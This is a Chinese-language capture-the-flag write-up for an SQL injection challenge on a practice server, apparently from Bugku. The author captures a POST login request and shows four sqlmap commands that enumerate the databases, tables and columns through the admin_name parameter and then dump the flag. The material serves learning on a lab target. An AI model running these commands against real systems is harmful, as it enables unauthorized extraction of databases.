首先,通過這個URL:http://120.24.86.145:9001/sql/
和這個風騷的界面,很明顯的SQL注入題目
然后打開源代碼看看:
action居然沒有目標腳本???
這基本上可以驗證就是使用sql注入了
既然是sql注入,那就要用到注入神器sqlmap了!
不過,因為這是post方法,所以我們只能使用-r + 請求頭的方式
接下來是保存請求頭
首先打開火狐代理:
//無關緊要的小技巧:最好在輸入框里輸入好用戶名和密碼之后再點提交
//無關緊要的注意點:一定要把里面的內容全選(Ctrl+A)再copy to file
我又把保存好的文件拖到了kali攻擊機上,路徑是:/zzz/1.txt
接下來素質四連它:
//以下命令在kali 2.0中運行正常
1、sqlmap -r "/zzz/1.txt" -p admin_name --dbs
-r + 路徑是以只讀方式打開 -p + admin_name是選取admin_name為注入點(injection point) --dbs是爆破數據庫名
2、sqlmap -r "/zzz/1.txt" -D bugkusql1 -p admin_name --tables
--tables 是爆列表名
3、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
--columns是爆列名
4、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
--dump是爆字段
??我不明白的是,為什么爆字段的時候,不需要輸入y/n而是不停的回車就行了呢?這兩種操作究竟有什么不同呢?
最后得到flag